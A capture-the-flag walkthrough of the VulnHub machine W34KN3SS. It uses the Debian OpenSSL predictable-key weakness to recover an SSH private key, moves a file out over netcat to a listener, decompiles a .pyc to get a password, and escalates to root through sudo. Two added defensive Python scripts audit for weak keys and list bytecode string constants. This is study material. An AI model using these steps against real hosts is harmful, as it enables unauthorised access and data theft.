vulnhub-w34kn3ss (OSCP-like)

Posted by admin

vulnhub-w34kn3ss

OSCP-like machine series

Bob 1.0.1: https://www.vulnhub.com/entry/bob-101,226/
Obtained via https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview

Date: 07/08/2022
Difficulty: Easy
Tags: sudo -l

Information gathering

Port scan

➜  bypassav nmap -p- 192.168.31.178 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-08 06:12 EDT
Nmap scan report for 192.168.31.178
Host is up (0.00030s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
|_  256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Not valid before: 2018-05-05T11:12:54
|_Not valid after:  2019-05-05T11:12:54
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

Ports 22, 80 and 443 are open.

The certificate subject on port 443 (commonName=weakness.jth) shows that a hosts entry is needed (replace ip with the target address):

ip weakness.jth

Home page

[screenshot of the home page]

Directory scan

[04:19:48] 200 -  526B  - /index.html                                       
[04:19:58] 301 -  314B  - /private  ->  http://weakness.jth/private/        
[04:20:00] 200 -   14B  - /robots.txt

From the scan results, opening http://weakness.jth/private/ reveals two files, with the following contents:

notes.txt

this key was generated by openssl 0.9.8c-1

and mykey.pub

Exploitation

➜  W34KN3SS searchsploit  openssl 0.9.8c-1
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH              | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH              | linux/remote/5720.py
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)       | linux/remote/5632.rb
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

5622.txt gives the exploitation steps:

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
            https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 
Bits, generated on an upatched debian (this is the key this exploit will 
break)

4. Run the perl script and give it the location to where you extracted 
the bzip2 mentioned.

Root cause
Roughly: the affected OpenSSL versions could only ever generate a small, fixed set of keys, so the whole set can be generated in advance; finding the entry identical to mykey.pub gives the corresponding private key.

Download and extract the archive

➜  W34KN3SS cd rsa 
➜  rsa cat ../mykey.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster
➜  rsa grep -R "Do0qVzzxsnTxB5JAfF7ifoDZp2yczZg"
2048/4161de56829de2fe64b9055711f531c1-2537.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster

This is the dictionary entry whose public key is identical to mykey.pub; the matching private key has the same file name without the .pub suffix.
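The grep above does the lookup by eye. The following Python script is added here as an illustration; it is not part of the original walkthrough or of the exploit-db entry. It performs the same check in the defensive direction, the way Debian's openssh-blacklist / ssh-vulnkey tooling did: it parses OpenSSH public-key lines, computes their SHA256 fingerprints, and flags any authorized_keys entry whose fingerprint appears in a pre-built set of known-weak keys. The weak set here is built only from the mykey.pub line shown on this page; in practice it would be populated from the full pre-generated dictionary. The ed25519 entry in the sample authorized_keys is constructed placeholder data, not a real key, and all function names are this example's own.

```python
import base64
import hashlib
import struct

# Public key the walkthrough found in /private/mykey.pub (copied from the page).
WEAK_KEY_LINE = "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"


def split_wire_fields(blob: bytes) -> list:
    """Split an SSH wire-format public key blob into its length-prefixed fields."""
    fields, off = [], 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length prefix")
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + length > len(blob):
            raise ValueError("field runs past end of blob")
        fields.append(blob[off:off + length])
        off += length
    return fields


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in the format printed by `ssh-keygen -lf` (unpadded base64)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_pubkey_line(line: str) -> dict:
    """Parse one authorized_keys / .pub line, tolerating leading options without spaces."""
    parts = line.split()
    for idx, tok in enumerate(parts):
        if tok.startswith(("ssh-", "ecdsa-", "sk-")):
            break
    else:
        raise ValueError("no key type token found")
    key_type, b64 = parts[idx], parts[idx + 1]
    blob = base64.b64decode(b64, validate=True)
    fields = split_wire_fields(blob)
    if fields[0] != key_type.encode():
        raise ValueError("key type token does not match blob")
    info = {"type": key_type, "fingerprint": fingerprint(blob)}
    if key_type == "ssh-rsa":
        # RSA blob fields: type string, public exponent e (mpint), modulus n (mpint)
        e = int.from_bytes(fields[1], "big")
        n = int.from_bytes(fields[2], "big")
        info.update(e=e, bits=n.bit_length())
    return info


def build_weak_set(pub_lines) -> set:
    """Fingerprints of every known-weak public key (the pre-generated dictionary)."""
    return {parse_pubkey_line(l)["fingerprint"] for l in pub_lines}


def audit_authorized_keys(text: str, weak: set) -> list:
    """Return (line number, key type, fingerprint) for every key in text whose fingerprint is weak."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        info = parse_pubkey_line(line)
        if info["fingerprint"] in weak:
            findings.append((lineno, info["type"], info["fingerprint"]))
    return findings


def constructed_ed25519_line() -> str:
    """A syntactically valid ssh-ed25519 line with placeholder key bytes (constructed, not a real key)."""
    pk = bytes(range(32))
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + pk
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " constructed@example"


# Constructed authorized_keys: one entry that is not in the weak set, one that is.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    constructed_ed25519_line(),
    'command="/usr/bin/true" ' + WEAK_KEY_LINE,
])

if __name__ == "__main__":
    weak = build_weak_set([WEAK_KEY_LINE])
    for lineno, ktype, fp in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, weak):
        print(f"line {lineno}: {ktype} {fp} is a known-weak key")
```

Run as a script it prints the one flagged entry. An operator would build the weak set from the full dictionary's .pub files and run the audit over every authorized_keys and known_hosts on the host; matching by fingerprint rather than by substring, as the grep above does, also catches the same key when it has been re-commented or wrapped. The parser is deliberately simple: authorized_keys options that themselves contain spaces (for example a quoted command with arguments) would need a real option parser.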

Initial access

n30

➜  rsa ssh  -i ./2048/4161de56829de2fe64b9055711f531c1-2537  n30@192.168.31.178
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

New release '20.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Jul  8 14:46:02 2022 from 192.168.31.134
n30@W34KN3SS:~$ whoami
n30

The user's home directory contains the following files:

n30@W34KN3SS:~$ pwd
/home/n30
n30@W34KN3SS:~$ ls -al
total 44
drwxr-xr-x 5 n30  n30  4096 Aug 14  2018 .
drwxr-xr-x 3 root root 4096 May  5  2018 ..
-rw------- 1 n30  n30  1215 Jul  9 11:03 .bash_history
-rw-r--r-- 1 n30  n30   220 May  5  2018 .bash_logout
-rw-r--r-- 1 n30  n30  3771 May  5  2018 .bashrc
drwx------ 2 n30  n30  4096 May  5  2018 .cache
-rwxrwxr-x 1 n30  n30  1138 May  8  2018 code
drwxrwxr-x 3 n30  n30  4096 May  5  2018 .local
-rw-r--r-- 1 n30  n30   818 May  7  2018 .profile
drwxrwxr-x 2 n30  n30  4096 May  5  2018 .ssh
-rw-r--r-- 1 n30  n30     0 May  5  2018 .sudo_as_admin_successful
-rw-rw-r-- 1 n30  n30    33 May  8  2018 user.txt

Transfer the file code to Kali

On Kali

➜  W34KN3SS nc -lvp 1234 > code
listening on [any] 1234 ...
connect to [192.168.31.134] from weakness.jth [192.168.31.178] 53978
^C
➜  W34KN3SS file code 
code: python 2.7 byte-compiled

On the target

n30@W34KN3SS:~$ which nc
/bin/nc
n30@W34KN3SS:~$ cat code | nc 192.168.31.134 1234

After retrieving the file, upload it to an online decompiler to recover the source.

[screenshot of the decompiled source]

Printing the value of inf in the recovered source gives the user's password.
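Byte-compiling a script does not hide the literals it contains: every string constant survives in the code object's co_consts, which is why an online decompiler (or even a plain walk of the constants) exposes a hard-coded credential. The Python script below is an added example, not the target's code file and not the decompiler's output. It compiles a constructed stand-in script, writes it in the CPython 3.7+ .pyc layout, and then lists the string constants without decompiling anything. The real code file on the target is Python 2.7 bytecode, whose header layout and marshal format differ, but the lesson is the same. The stand-in source, the derive helper and the placeholder secret are assumptions of this example.

```python
import importlib.util
import marshal
import struct
import types

# Constructed stand-in for the target's `code` script; the real file is not reproduced here.
CONSTRUCTED_SOURCE = '''
import hashlib

def derive(seed):
    inf = hashlib.md5(seed.encode()).hexdigest()
    return inf

def main():
    user = "n30"
    password = derive("constructed-seed-value")
    fallback = "Pl4ceholder-Secret-constructed"
    print(user, password, fallback)
'''


def build_pyc(code: types.CodeType) -> bytes:
    """Serialize a code object the way CPython writes a timestamp-based .pyc (3.7+: 16-byte header)."""
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, 0)  # flags, mtime, source size
    return header + marshal.dumps(code)


def load_code_from_pyc(data: bytes) -> types.CodeType:
    """Read a .pyc produced by this interpreter back into a code object."""
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic number does not match the running interpreter")
    return marshal.loads(data[16:])


def walk_constants(code: types.CodeType):
    """Yield every constant reachable from a code object, recursing into nested functions."""
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_constants(const)
        elif isinstance(const, (tuple, frozenset)):
            yield from const
        else:
            yield const


def string_constants(data: bytes) -> list:
    """All string literals embedded in a .pyc, in the order the compiler stored them."""
    return [c for c in walk_constants(load_code_from_pyc(data)) if isinstance(c, str)]


def secret_like(strings, min_len=8) -> list:
    """Crude triage: keep longer strings that mix letters and digits (typical of hard-coded secrets)."""
    return [
        s for s in strings
        if len(s) >= min_len
        and any(ch.isdigit() for ch in s)
        and any(ch.isalpha() for ch in s)
    ]


def strings_in_compiled(src: str) -> list:
    """Compile src to a .pyc image and return its string constants."""
    return string_constants(build_pyc(compile(src, "code", "exec")))


if __name__ == "__main__":
    found = strings_in_compiled(CONSTRUCTED_SOURCE)
    print("string constants:", found)
    print("secret-like:", secret_like(found))
```

The same walk works on a real .pyc read from disk with the interpreter that produced it; for a file from another Python version the marshal payload must be loaded by that version. Note that a value computed at runtime, like the hash derive() returns, is not a constant and is not recovered this way, but its seed is, which is usually enough.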

ROOT

n30@W34KN3SS:~$ sudo -l
[sudo] password for n30: 
Matching Defaults entries for n30 on W34KN3SS:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User n30 may run the following commands on W34KN3SS:
    (ALL : ALL) ALL
n30@W34KN3SS:~$ sudo su
root@W34KN3SS:/home/n30# cat /root/root.txt 
a1d2fab76ec6af9b651d4053171e042e
root@W34KN3SS:/home/n30#
